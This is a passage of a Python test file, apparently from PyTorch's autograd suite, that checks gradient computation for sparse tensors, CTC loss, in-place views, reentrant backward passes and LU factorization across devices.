# When the distances are 0 sizex = (1, 27, 32) for p in [0, 1, 2, 3, 1.5, 2.5, float('inf')]: x = torch.randn(sizex, device=device, dtype=torch.float) dist_grad = torch.randn((1, 27, 27), device=device, dtype=torch.float) y = x.clone() eps = 1e-6 x.requires_grad = True d = torch.cdist(x, y) d.backward(dist_grad) # Check that the backward passs does not contain invalid # values such as nan or inf assert torch.isfinite(x.grad).all() def test_parameter_resize(self, device): asd = torch.nn.Parameter(torch.ones(16, dtype=torch.double, device=device)) for i in range(2): with torch.no_grad(): asd.set_(asd[1:]) asd.grad = None m = torch.cat((asd, asd)) m.sum().backward() @dtypes(torch.double, torch.cdouble) def test_sparse_ctor_getter_backward(self, device, dtype): # See NOTE [ Sparse: autograd and API ] on the expected behavior of this test def _test(size, sparse_dim, nnz, device): v_size = [nnz] + list(size[sparse_dim:]) i = torch.rand(sparse_dim, nnz) i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i)) i = i.to(torch.long) inp = torch.randn(v_size, dtype=torch.double, device=device, requires_grad=True) other = self.genSparseTensor(size, sparse_dim, nnz, is_uncoalesced=True, device=device, dtype=dtype)[0] def fn(v): x = torch.sparse_coo_tensor(i, v, size, dtype=dtype, device=device) y = (x + other).coalesce() yv = y.values() new_v = yv.tanh() z = torch.sparse_coo_tensor(y.indices(), new_v, y.size()) return z.coalesce().values() gradcheck(fn, (inp,), check_batched_grad=False) # FIXME: make gradgradcheck work. # gradgradcheck(fn, (inp,), check_batched_grad=False) # assert that _values is non-differentiable with self.assertRaisesRegex(RuntimeError, "does not have a grad_fn"): other.detach().requires_grad_()._values().backward(torch.ones_like(other._values())) for empty_i, empty_v, empty_nnz in product([True, False], repeat=3): sparse_size = [] if empty_i else [2, 1] dense_size = [1, 0, 2] if empty_v else [1, 2] nnz = 0 if empty_nnz else 5 _test(sparse_size + dense_size, len(sparse_size), nnz, device) @dtypes(torch.double, torch.cdouble) def test_sparse_backward(self, device, dtype): class FixedGradientFunction(Function): @staticmethod def forward(ctx, x, grad_x): ctx.save_for_backward(grad_x) return x @staticmethod def backward(ctx, grad_x): saved_grad_x, = ctx.saved_tensors return saved_grad_x, None size = torch.Size([6, 3, 2]) i1 = torch.tensor([ [0, 3, 4], [0, 2, 2], ], dtype=torch.long) v1 = make_tensor([3, 2], dtype=dtype, device=device) sparse_grad1 = torch.sparse_coo_tensor(i1, v1, size, dtype=dtype, device=device) i2 = torch.tensor([ [0, 1, 3, 4], [0, 1, 2, 2], ], dtype=torch.long) v2 = make_tensor([4, 2], dtype=dtype, device=device) sparse_grad2 = torch.sparse_coo_tensor(i2, v2, size, dtype=dtype, device=device) dense_grad = torch.rand(size, device=device, dtype=dtype) fn = FixedGradientFunction # sparse first x = torch.randn(size, dtype=dtype, device=device, requires_grad=True) (fn.apply(x, sparse_grad1) + fn.apply(x, dense_grad) + fn.apply(x, sparse_grad2)).sum().backward() self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2) # dense first x = torch.randn(size, dtype=dtype, device=device, requires_grad=True) (fn.apply(x, dense_grad) + fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward() self.assertEqual(x.grad, dense_grad + sparse_grad1 + sparse_grad2) # sparse only x = torch.randn(size, dtype=dtype, device=device, requires_grad=True) (fn.apply(x, sparse_grad1) + fn.apply(x, sparse_grad2)).sum().backward() self.assertEqual(x.grad, sparse_grad1 + sparse_grad2) # autograd tests via common_method_invocations don't allow input tensors to # be sparse (RuntimeError: gradcheck expects all tensor inputs are dense when # check_sparse_nnz is set to False.) def test_sparse_mask_autograd(self, device): tensor = torch.randn(3, requires_grad=True, device=device) mask = torch.ones(3, device=device) mask[1] = 0 mask = mask.to_sparse() converted = tensor.sparse_mask(mask).to_dense() converted.sum().backward() self.assertEqual(tensor.grad, mask.to_dense()) def test_pyscalar_conversions(self, device): def _test_pyscalar_conversions(t, integral_conv): # integral -> integral l = t(torch.zeros(1, 1, 1, dtype=torch.long)) pyscalar = -12345 l[0] = pyscalar self.assertEqual(integral_conv(l), pyscalar) # floating point -> floating point f = Variable(t(torch.randn(1, 1, dtype=torch.double))) pyscalar = -12345.1 f[0] = pyscalar self.assertEqual(float(f), pyscalar) f[0] = nan self.assertTrue(math.isnan(float(f))) f[0] = inf self.assertEqual(float(f), inf) f[0] = -inf self.assertEqual(float(f), -inf) # integral -> floating point # check we can convert something that loses precision pyscalar = 1234567890123456789 self.assertNotEqual(pyscalar, integral_conv(float(pyscalar))) l[0] = pyscalar self.assertEqual(float(l), float(pyscalar)) # floating point -> integral f[0] = nan self.assertRaises(ValueError, lambda: integral_conv(f[0])) f[0] = inf self.assertRaises(OverflowError, lambda: integral_conv(f[0])) f[0] = -inf self.assertRaises(OverflowError, lambda: integral_conv(f[0])) f[0] = sys.float_info.max self.assertEqual(integral_conv(f), sys.float_info.max) # bool, nonzero def test_nonzero(tensor, value, expected): tensor[0] = value self.assertEqual(expected, bool(tensor)) self.assertEqual(expected, True if tensor else False) test_nonzero(l, 0, False) test_nonzero(l, -2, True) test_nonzero(f, 0.0, False) test_nonzero(f, sys.float_info.min, True) test_nonzero(f, nan, bool(nan)) test_nonzero(f, inf, bool(inf)) test_nonzero(f, -inf, bool(-inf)) _test_pyscalar_conversions(lambda x: x.to(device), lambda x: int(x)) @dtypesIfCUDA(torch.half, torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64) @dtypes(torch.float, torch.double, torch.int8, torch.int16, torch.int32, torch.int64) def test_set_requires_grad_only_for_floats(self, device, dtype): def f1(): a = torch.ones(1, dtype=dtype, device=device) a.requires_grad_() def f2(): a = torch.ones(1, dtype=dtype, device=device) a.requires_grad = True def f3(): torch.ones(1, dtype=dtype, device=device, requires_grad=True) a = torch.ones(1, dtype=dtype, device=device) a.requires_grad = False # should always work a.requires_grad_(False) for f in [f1, f2, f3]: if dtype.is_floating_point: f() else: with self.assertRaisesRegex(RuntimeError, 'floating point', msg="dt: {} device: {}".format(a.dtype, a.device)): f() @onlyCUDA def test_advanced_indexing_backwards_large(self, device): # See https://github.com/pytorch/pytorch/issues/22843 n = (1 << 16) x = torch.rand(n, 1, device=device, requires_grad=True) a = x[:, [0]] a.sum().backward() self.assertEqual(x.grad, torch.ones(n, 1, device=device)) def test_advanced_indexing_backwards_memory_format(self, device): # See https://github.com/pytorch/pytorch/issues/36956 shape = (2, 8, 1, 2) i = torch.randint(1, shape, device=device).contiguous(memory_format=torch.channels_last) x = torch.randn(shape, requires_grad=True, device=device) x[i].sum().backward() def _test_reentrant_parent_error_on_cpu(self, device): t1 = torch.rand([3, 3], requires_grad=True) t2 = torch.rand([3, 3], device=device, requires_grad=True) t3 = torch.rand([3, 3], device=device, requires_grad=True) # Parent graph cpu graph. t4 = t1 * t1 t5 = TestAutograd.SimulateBackwardError.apply(t4) # Child gpu graph (much longer than parent graph). prev = t2 * t2 for i in range(10): prev = prev * t2 reentrant_root = prev class ReentrantFunc(Function): @staticmethod def forward(ctx, inp): return inp.clone() @staticmethod def backward(ctx, grad): # Reentrant backward in child will take much longer. reentrant_root.backward() return grad # Parent gpu graph. t6 = ReentrantFunc.apply(t3) t7 = t6 * t6 # Parent graph will error out first, while child graph will continue executing. with self.assertRaisesRegex(Exception, "Simulate error"): torch.autograd.backward([t5.sum(), t7.sum()]) # No grads should be accumulated since child graph will stop execution # after parent receives error. self.assertIsNone(t2.grad) self.assertIsNone(t1.grad) self.assertIsNone(t3.grad) @onlyCUDA def test_reentrant_parent_error_on_cpu(self, device): before = CudaMemoryLeakCheck.get_cuda_memory_usage() # Run as separate function so that gc can clean up everything when we # check for memory usage. self._test_reentrant_parent_error_on_cpu(device) # Wait for autograd thread to cleanup failed tasks. after = CudaMemoryLeakCheck.get_cuda_memory_usage() start = time.time() while before != after and time.time() - start < 30: time.sleep(0.1) after = CudaMemoryLeakCheck.get_cuda_memory_usage() self.assertEqual(before, after) # test for backward in https://github.com/pytorch/pytorch/issues/15511 def test_pdist_large(self, device): def func(x): return torch.pdist(x, p=2) # shape[0] should be able to be (roughly) arbitrarily large, but the kernel # is currently limited to smaller sizes (see issue above); this is just testing # a floor. shape = (1000, 1) x = torch.randn(shape, device=device).requires_grad_() output = torch.pdist(x, p=2) # just run a single backward, as gradcheck/gradgradcheck is expensive here output.sum().backward() def test_where_functional(self, device): x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True) y = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True) cond = mask_not_all_zeros((5, 5)).to(device=device) def where(cond, x, y): return torch.where(cond, x, y) gradcheck(where, [cond, x, y], raise_exception=True) gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, device=device)]) x = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True) y = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True) gradcheck(where, [cond, x, y], raise_exception=True) gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, 5, device=device)]) def test_where_scalar(self, device): x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True) scalar = 4. cond = mask_not_all_zeros((5, 5)).to(device=device) def where_scalar_first(cond, x): return torch.where(cond, scalar, x) def where_scalar_second(cond, x): return torch.where(cond, x, scalar) gradcheck(where_scalar_first, (cond, x)) gradgradcheck(where_scalar_first, (cond, x)) gradcheck(where_scalar_second, (cond, x)) gradgradcheck(where_scalar_second, (cond, x)) @skipCUDAIf(True, """Test is flaky on Linux and Windows, typical error message: https://github.com/pytorch/pytorch/issues/34870""") def test_ctc_loss(self, device): batch_size = 64 num_labels = 101 target_length = 15 gradcheck_input_size = 10 ZERO_NONE = 0 ZERO_SOME = 1 ZERO_ALL = 2 # input_length, vary_lengths, zero_lengths tests = [(150, False, ZERO_NONE), (150, True, ZERO_NONE), (50, True, ZERO_SOME), (50, True, ZERO_ALL)] if 'cuda' in device: tests += [(50, False, ZERO_NONE), (50, True, ZERO_NONE), (150, True, ZERO_SOME), (150, True, ZERO_ALL)] for input_length, vary_lengths, zero_mode in tests: targets = torch.randint(1, num_labels, (batch_size, target_length), device=device, dtype=torch.long) x = torch.randn(gradcheck_input_size, dtype=torch.double, device=device, requires_grad=True) tile_factors = torch.randn(input_length * batch_size * num_labels // gradcheck_input_size + 1, device=device) input_lengths = [(torch.randint(input_length // 2, input_length + 1, ()).item() if vary_lengths or i == 0 else input_length) for i in range(batch_size)] if zero_mode == ZERO_ALL: target_lengths = [0 for _ in range(batch_size)] else: target_lengths = [(torch.randint(target_length // 2, target_length + 1, ()).item() if vary_lengths else target_length) for _ in range(batch_size)] if zero_mode == ZERO_SOME: idxes = torch.randint(0, batch_size, (10,)) for i in idxes: target_lengths[i] = 0 def ctc_after_softmax(x): x_full = ((x[:, None] * tile_factors[None, :]).view(-1)[:input_length * batch_size * num_labels] .view(input_length, batch_size, num_labels)) log_probs = torch.log_softmax(x_full, 2) return torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths) gradcheck(ctc_after_softmax, [x]) @onlyCUDA @skipCUDAIfRocm @skipCUDAIfCudnnVersionLessThan(7600) def test_ctc_loss_cudnn(self, device): batch_size = 16 input_length = 30 num_labels = 101 target_length = 15 targets = torch.randint(1, num_labels, (batch_size * target_length,), device='cuda', dtype=torch.long) log_probs = torch.log_softmax(torch.randn(input_length, batch_size, num_labels, device='cuda', dtype=torch.float), 2) log_probs.requires_grad_() input_lengths = batch_size * [input_length] target_lengths = batch_size * [target_length] grad_out = torch.randn(batch_size, device='cuda', dtype=torch.float) with torch.backends.cudnn.flags(enabled=False): loss_native = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none') grad_native, = torch.autograd.grad(loss_native, log_probs, grad_out) loss_cudnn = torch.nn.functional.ctc_loss(log_probs, targets.to('cpu', torch.int32), input_lengths, target_lengths, reduction='none') self.assertTrue("Cudnn" in str(loss_cudnn.grad_fn)) grad_cudnn, = torch.autograd.grad(loss_cudnn, log_probs, grad_out) self.assertEqual(grad_cudnn, grad_native, atol=1e-4, rtol=0) def test_leaky_relu_inplace_with_neg_slope(self, device): a = torch.tensor([-1., 1.], device=device, requires_grad=True) b = torch.nn.functional.leaky_relu_(a.clone(), -2) with self.assertRaisesRegex(RuntimeError, "call out-of-place version"): b.backward(torch.ones(2, device=device)) a = torch.tensor([-1., 1.], device=device, requires_grad=True) b = torch.nn.functional.rrelu_(a.clone(), -5.0, 1.0) with self.assertRaisesRegex(RuntimeError, "call out-of-place version"): b.backward(torch.ones(2, device=device)) def test_leaky_relu_inplace_with_zero_slope(self, device): a = torch.tensor([-2., 0., 2.], device=device, requires_grad=True) b = torch.nn.functional.leaky_relu_(a.clone(), 0.0) b.backward(torch.ones(3, device=device)) expected = torch.tensor([0., 0., 1.], device=device) self.assertEqual(a.grad, expected) @onlyOnCPUAndCUDA def test_elu_inplace_with_neg_alpha(self, device): a = torch.tensor([-1., 1.], device=device, requires_grad=True) b = torch.nn.functional.elu_(a.clone(), alpha=-2) with self.assertRaisesRegex(RuntimeError, "call out-of-place version"): b.backward(torch.ones(2, device=device)) a = torch.tensor([-1., 1.], device=device, requires_grad=True) b = torch.nn.functional.celu_(a.clone(), alpha=-2) with self.assertRaisesRegex(RuntimeError, "call out-of-place version"): b.backward(torch.ones(2, device=device)) @onlyCUDA def test_free_unneeded_tensor(self, device): x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True) m = torch.randn(1, 3, 1, 1, device=device) z = x.sum() base_mem = torch.cuda.memory_allocated() z = ((x + 2) * m).sum() end_mem = torch.cuda.memory_allocated() # In the end the memory usage should remain equal, because neither of # (x + 2) and ((x + 2) * m) should be kept alive for backward, while the # previous allocation of z had the same size as the current one. self.assertEqual(base_mem, end_mem) @onlyCUDA def test_pin_memory(self, device): x = torch.randn(2, 2, dtype=torch.double, requires_grad=True) self.assertEqual(x, x.pin_memory()) self.assertIsNot(x, x.pin_memory()) self.assertTrue(x.pin_memory().requires_grad) gradcheck(lambda x: x.pin_memory(), [x]) gradgradcheck(lambda x: x.pin_memory(), [x]) @skipCUDAIfRocm @onlyCUDA def test_profiler_emit_nvtx(self, device): # This test is not intended to ensure correctness of nvtx ranges. # That would require something a great deal more complex (you'd have to create a # profile in a subprocess, open it, and parse the sql somehow). # This test is merely intended to catch if emit_nvtx breaks on construction. a = torch.tensor([1, 2, 3], dtype=torch.float32, device=device) with torch.cuda.profiler.profile(): with emit_nvtx(): a.add(1.0) @onlyCUDA def test_rnn_backward_to_input_but_not_parameters(self, device): # this checks whether it is possible to not require # weight parameters, but require inputs, see #7722 l = torch.nn.LSTM(2, 3).to(device) for p in l.parameters(): p.requires_grad = False s = torch.randn(1, 1, 2, requires_grad=True, device=device) out, _ = l(s) out.sum().backward() self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0) @onlyCUDA def test_lstmcell_backward_only_one_output_grad(self, device): # checks that undefined gradients doen't hamper the backward # see #11872 l = torch.nn.LSTMCell(2, 3).to(device).double() s = torch.randn(1, 2, device=device, dtype=torch.double, requires_grad=True) for i in range(2): out = l(s)[i] out.sum().backward() self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0) def _test_rnn_mod(self, mod, inp): def flatten_out(mod, inp): out = mod(inp) return tuple([t if isinstance(t, torch.Tensor) else tt for t in out for tt in t]) gradcheckfunc = partial(flatten_out, mod) with torch.backends.cudnn.flags(enabled=False): gradcheck(gradcheckfunc, inp, check_batched_grad=False) gradgradcheck(gradcheckfunc, inp, check_batched_grad=False) if inp.is_cuda and not TEST_WITH_ROCM: # Assert that we have good error message around unsupported CuDNN double backward # NB: we trigger double backward using .backward() instead of autograd.grad due to # https://github.com/pytorch/pytorch/issues/37874 with torch.backends.cudnn.flags(enabled=True): result = gradcheckfunc(inp) result[0].sum().backward(create_graph=True) grad0 = next(mod.parameters()).grad with self.assertRaisesRegex(RuntimeError, "please disable the CuDNN backend temporarily"): grad0.sum().backward() # Here we avoid the backward(create_graph=True) memory leak # described in https://github.com/pytorch/pytorch/issues/7343 for param in mod.parameters(): param.grad = None inp.grad = None def test_LSTM_grad_and_gradgrad(self, device): hsize = 4 inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True) for bias in [True, False]: mod = torch.nn.LSTM(hsize, hsize, bias=bias).to(device).to(torch.float64) self._test_rnn_mod(mod, inp) def test_GRU_grad_and_gradgrad(self, device): hsize = 4 inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True) for bias in [True, False]: mod = torch.nn.GRU(hsize, hsize, bias=bias).to(device).to(torch.float64) self._test_rnn_mod(mod, inp) def test_copysign_subgradient(self, device): # Input is 0.0 x = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True) y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True) out = torch.copysign(x, y) out.sum().backward() self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0]) self.assertEqual(y.grad.tolist(), [0.0] * 3) # Input is -0.0 x = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True) y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True) out = torch.copysign(x, y) out.sum().backward() self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0]) self.assertEqual(y.grad.tolist(), [0.0] * 3) # Other is 0.0 x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True) y = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True) out = torch.copysign(x, y) out.sum().backward() self.assertEqual(x.grad.tolist(), [-1.0, 0.0, 1.0]) self.assertEqual(y.grad.tolist(), [0.0] * 3) # Other is -0.0 x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True) y = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True) out = torch.copysign(x, y) out.sum().backward() self.assertEqual(x.grad.tolist(), [1.0, 0.0, -1.0]) self.assertEqual(y.grad.tolist(), [0.0] * 3) @deviceCountAtLeast(1) def test_grad_assignment(self, devices): x = torch.randn(5, 5, device=devices[0]) # Tests that the wrong shape raises with self.assertRaises(RuntimeError): x.grad = torch.randn(2, 2, device=devices[0]) # Tests that the wrong dtype raises with self.assertRaises(RuntimeError): x.grad = torch.randn(5, 5, dtype=torch.long, device=devices[0]) # Tests that self-assignment raises with self.assertRaises(RuntimeError): x.grad = x # Tests device -> cpu grad assignment raises if self.device_type != 'cpu': with self.assertRaises(RuntimeError): t_cpu = torch.rand(5, 5) t_cpu.grad = torch.randn(5, 5, device=devices[0]) # Tests half type on CUDA if self.device_type == 'cuda': x = x.to(dtype=torch.half, device=devices[0]) x.grad = torch.zeros_like(x) # Tests cross-device assignment raises if len(devices) > 1: x = torch.randn(5, 5, device=devices[0]) with self.assertRaises(RuntimeError): x.grad = torch.randn(5, 5, device=devices[1]) @deviceCountAtLeast(1) @dtypes(torch.float, torch.double) def test_requires_grad_factory(self, devices, dtype): fns = [torch.ones_like, torch.testing.randn_like] x = torch.randn(2, 3, dtype=dtype, device=devices[0]) for fn in fns: for requires_grad in [True, False]: output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad) self.assertEqual(requires_grad, output.requires_grad) self.assertIs(dtype, output.dtype) self.assertEqual(devices[0], str(x.device)) @deviceCountAtLeast(2) def test_unused_output_device(self, devices): from torch.nn.parallel._functions import Broadcast x = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True) outputs = Broadcast.apply(list(range(len(devices))), x) y = outputs[-1] * 2 y.sum().backward() # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095 self.assertEqualIgnoreType(x.grad, torch.ones(5, 5) * 2) @deviceCountAtLeast(2) def test_backward_device(self, devices): # check that current device matches the variable's device device = [None] class Identity(torch.autograd.Function): @staticmethod def forward(ctx, x): return x.clone() @staticmethod def backward(ctx, grad_output): device[0] = grad_output.device return grad_output.clone() v = torch.randn(1, device=devices[1], requires_grad=True) Identity.apply(v).backward() self.assertEqual(str(device[0]), devices[1]) @deviceCountAtLeast(2) def test_inputbuffer_add_multidevice(self, devices): input = torch.randn(1, device=devices[0], requires_grad=True) output = input.to(device=devices[1]) + input.to(device=devices[1]) output.backward() @onlyCPU def test_copy_(self, device): # At the time of writing this test, copy_ is not generated from native_functions.yaml # there was a bug that bfloat16 was not recognized as floating. x = torch.randn(10, device=device, requires_grad=True) floating_dt = [dt for dt in torch.testing.get_all_dtypes() if dt.is_floating_point] for dt in floating_dt: y = torch.empty(10, device=device, dtype=dt) y.copy_(x) self.assertTrue(y.requires_grad) z = x.to(torch.bfloat16) self.assertTrue(z.requires_grad) @onlyCUDA def test_simple_reentrant_cross_device(self, device): class ReentrantFunc(Function): _cpu_mode = True @staticmethod def forward(ctx, x): return x * (x + 2) @staticmethod def backward(ctx, grad_output): with torch.enable_grad(): if ReentrantFunc._cpu_mode: new_param = torch.randn(2, 2, requires_grad=True) (new_param ** 2).sum().backward() else: new_param = torch.randn(2, 2, device=device, requires_grad=True) (new_param ** 2).sum().backward() return grad_output # Reentrant starts on GPU thread, finishs on GPU thread x = torch.randn(2, 2, device=device, requires_grad=True) out = ReentrantFunc.apply(x) out.sum().backward() # Reentrant starts on CPU thread, finishs on GPU thread x = torch.randn(2, 2, requires_grad=True) # set ReentrantFunc node to GPU to emit tasks to GPU queue ReentrantFunc._cpu_mode = False out = ReentrantFunc.apply(x) out.sum().backward() # Reentrant starts on GPU thread, finishs on CPU thread x = torch.randn(2, 2, device=device, requires_grad=True) # set ReentrantFunc node to CPU to emit tasks to CPU queue ReentrantFunc._cpu_mode = True out = ReentrantFunc.apply(x) out.sum().backward() @onlyCUDA def test_cross_device_reentrant_autograd(self, device): # Output on gpu so that this task will be associated with the gpu thread def fn_on_gpu(inp): # Artificially increase the priority of the next op to make sure it runs # as soon as we reach it before the ops of branch1. dummy = inp * 2 * 2 * 2 * 2 return inp.to(device=device) def parent_on_cpu(inp): # Slow branch of ops on gpu so that the work queue for the gpu thread # won't empty too quickly. They also have smaller priorities than the # ones created by fn_on_gpu branch1 = inp.to(device=device) branch1 = branch1 / branch1 branch1 = branch1 / branch1 branch1 = branch1 / branch1 # Perform checkpoint on cpu tensors. So the last op performed in the reentrant # autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread. # So the cpu thread will notify the gpu thread with an empty NodeTask. branch2 = checkpoint(fn_on_gpu, inp) out = branch2 + branch1 return out inp = torch.rand(2, requires_grad=True) out = parent_on_cpu(inp) # This will segfault if the empty NodeTask is not handled properly in the # gpu thread ReadyQueue out.sum().backward() def test_inplace_view_backprop_base(self, device): # modify view and back-prop through base root = torch.randn(2, 2, device=device, requires_grad=True) x = root.clone() v1 = x.narrow(0, 0, 1) v1.mul_(2) x.sum().backward() self.assertEqual(root.grad.tolist(), [[2, 2], [1, 1]]) def test_inplace_view_backprop_view_of_view(self, device): # modify view and backprop through view-of-view root = torch.randn(2, 2, device=device, requires_grad=True) x = root.clone() v1 = x.narrow(0, 0, 1) v2 = x.narrow(0, 0, 1) v1.mul_(2) v2.sum().backward() self.assertEqual(root.grad.tolist(), [[2, 2], [0, 0]]) def test_inplace_view_of_view(self, device): # modify view-of-view and backprop through base root = torch.randn(2, 2, device=device, requires_grad=True) x = root.clone() v1 = x.narrow(0, 0, 1) v2 = v1.narrow(1, 1, 1) v2.mul_(2) x.sum().backward() self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1]]) def test_inplace_view_then_no_grad(self, device): # Perform an in-place operation on a view of a non-leaf variable. a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True) b = a * 2 c = b.view_as(b) c[0][0] = 3 # Force a graph update with grad disabled. with torch.no_grad(): c.grad_fn c.sum().backward() def test_inplace_view_gradcheck(self, device): # gradcheck modifications to views a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True) b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True) def func(root, b): x = root.clone() x.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b) x.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b) return x gradcheck(func, [a, b], raise_exception=True) go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True) gradgradcheck(func, (a, b), (go,)) def test_inplace_view_multiple_outputs(self, device): root = torch.arange(9., dtype=torch.double).reshape(3, 3).requires_grad_() x = root.clone() v1 = x.unbind() with self.assertRaises(RuntimeError): v1[0].mul_(2) def test_inplace_view_of_multiple_output_view(self, device): a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone() b = a.unbind(0) c = b[0].view_as(b[0]) with self.assertRaises(RuntimeError): c.mul_(2) def test_inplace_multiple_output_view_of_view(self, device): a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone() b = a.view_as(a) c = b.unbind(0) with self.assertRaises(RuntimeError): c[0].mul_(2) def test_inplace_view_makes_base_require_grad(self, device): # in-place modification to view makes base require grad a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False) b = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True) def func(root, b): x = root.clone() self.assertFalse(x.requires_grad) x.narrow(1, 2, 2).mul_(b) self.assertTrue(x.requires_grad) return x gradcheck(func, [a, b], raise_exception=True) go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True) gradgradcheck(func, (a, b), (go,)) def test_inplace_view_backprop_view(self, device): # modify view and backprop through view a = torch.tensor([2., 5.], device=device, requires_grad=False) b = torch.tensor([3.], device=device, requires_grad=True) res = a.narrow(0, 1, 1).mul_(b) res.sum().backward() self.assertEqual(b.grad.tolist(), [5]) self.assertIsNone(a.grad) def test_inplace_view_modify_base(self, device): # Test that an in-place operation on a base that forced it to require # grad also forces any previous views to require grad and backprop # correctly r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True) def fn(r): x = torch.ones(5, dtype=torch.double, device=device) v = x.select(0, 1) self.assertFalse(v.requires_grad) self.assertIsNone(v.grad_fn) x.add_(r) # v is now dependent on r due to the in-place op on x self.assertTrue(v.requires_grad) return v gradcheck(fn, [r]) gradgradcheck(fn, [r]) def test_inplace_view_python(self, device): # in-place modifications of Python-autograd created view a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True) b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True) class PyAdd(torch.autograd.Function): @staticmethod def forward(ctx, x, y): ctx.mark_dirty(x) x.add_(y) return x @staticmethod def backward(ctx, grad): return grad, grad def func(root, b): x = root.clone() PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b) PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b) return x gradcheck(func, [a, b], raise_exception=True) go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True) gradgradcheck(func, (a, b), (go,)) def test_inplace_view_non_contig(self, device): root = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True) x = root.clone() v1 = x.narrow(0, 0, 1) v2 = v1.narrow(1, 1, 1) v2.mul_(2) x.sum().backward() self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1], [1, 1]]) def test_inplace_view_multi_output_unsafe(self, device): for f in [lambda t: t.unsafe_split(1), lambda t: t.unsafe_split_with_sizes((1, 1, 1)), lambda t: t.unsafe_chunk(3)]: a = torch.randn(3, 3, device=device, requires_grad=True) b = a + a s1, s2, s3 = f(b) s1.mul_(s2) s1.sum().backward() def test_inplace_view_multi_output_safe(self, device): for f in [lambda t: t.split(1), lambda t: t.split_with_sizes((1, 1, 1)), lambda t: t.chunk(3)]: a = torch.randn(3, 3, device=device, requires_grad=True) b = a + a s1, s2, s3 = f(b) error_msg = 'This view is an output of a function that returns multiple views.' with self.assertRaisesRegex(RuntimeError, error_msg): s1.mul_(s2) def test_mv_grad_stride_0(self, device): # Reference: https://github.com/pytorch/pytorch/issues/38315 mat = torch.randn(2, 2, dtype=torch.double, device=device) vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True) def fn(vec): # Expand inside the function to make sure the input to # gradcheck does not have overlapping memory vec = vec.expand(2) return (mat @ vec).sum() gradcheck(fn, (vec)) gradgradcheck(fn, (vec)) @onlyCUDA def test_gradcheck_input_output_different_device(self, device): x = torch.ones((1,), dtype=torch.double, device="cuda", requires_grad=True) gradcheck(lambda x: x.to("cpu"), (x,)) x = torch.ones((1,), dtype=torch.double, device="cpu", requires_grad=True) gradcheck(lambda x: x.to("cuda"), (x,)) def test_logcumsumexp_large_value(self, device): a = torch.rand(4, 4, 4, dtype=torch.double, requires_grad=True) with torch.no_grad(): # Large Number a[0] = 10000 gradcheck(lambda x: x.logcumsumexp(0), a) gradgradcheck(lambda x: x.logcumsumexp(0), a) gradcheck(lambda x: x.logcumsumexp(1), a) gradgradcheck(lambda x: x.logcumsumexp(1), a) gradcheck(lambda x: x.logcumsumexp(2), a) gradgradcheck(lambda x: x.logcumsumexp(2), a) @slowTest def test_lu_backward(self, device): def run_test(*sizes): x = torch.rand(*sizes, device=device, dtype=torch.double).requires_grad_(True) gradcheck(lambda x: x.lu(get_infos=True), x) gradgradcheck(lambda x: x.lu(get_infos=True), x) gradcheck(lambda x: x.lu(get_infos=False), x) gradgradcheck(lambda x: x.lu(get_infos=False), x) # there is no pivot-less LU factorization on CPU if x.device.type == 'cuda': gradcheck(lambda x: x.lu(pivot=False, get_infos=True), x) gradgradcheck(lambda x: x.lu(pivot=False, get_infos=True), x) gradcheck(lambda x: x.lu(pivot=False, get_infos=False), x) gradgradcheck(lambda x: x.lu(pivot=False, get_infos=False), x) run_test(3, 3) run_test(3, 3, 3) run_test(3, 3, 3, 3) run_test(5, 5) run_test(3, 5, 5) 